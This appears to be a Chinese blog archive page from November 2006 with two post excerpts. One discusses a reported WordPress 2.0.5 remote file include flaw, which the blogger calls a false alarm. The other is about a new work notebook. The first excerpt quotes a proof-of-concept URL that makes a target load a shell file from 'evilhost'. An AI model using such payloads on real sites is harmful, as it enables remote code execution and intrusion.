2006-11-21 的文章

Wordpress 2.0.5 Remote File Include Vulnerability

有在留意安全消息的人, 最近可能會看到這個標題然後嚇一跳 -

『 Wordpress functions.php remote file include vulnerability 』

ex: http://www.securityfocus.com/bid/21004

啥 !? Wordpress 這麼多人用的 blog 系統,
連最新的 2.0.5 都還有這麼大的洞洞 !?

原發表者指出可以用
http://www.target.com/wp-includes/functions.php?file=http://evilhost/shell.txt

讓 server 去執行遠端的檔案,
理論上如果成立的話就可以直接拿到 shell .
 
 
........ !!
                                        
 
哈, 免驚, 其實這是個芭樂 !

閱讀全文 1 則留言 2006-11-21 18:21

My Third Notebook

來公司兩個星期後, 配發的 Notebook 下來了,
還是全新的 剛送來 由我親手拆封 ~
雖然標題寫 Third Notebook, 但實際上也不算我的,
只是在職期間歸我用就是 XD

閱讀全文 新增留言 2006-11-21 18:17

日曆

November 2006
M T W T F S S
« Oct   Dec »
 12345
6789101112
13141516171819
20212223242526
27282930  

各分類文章

各月份文章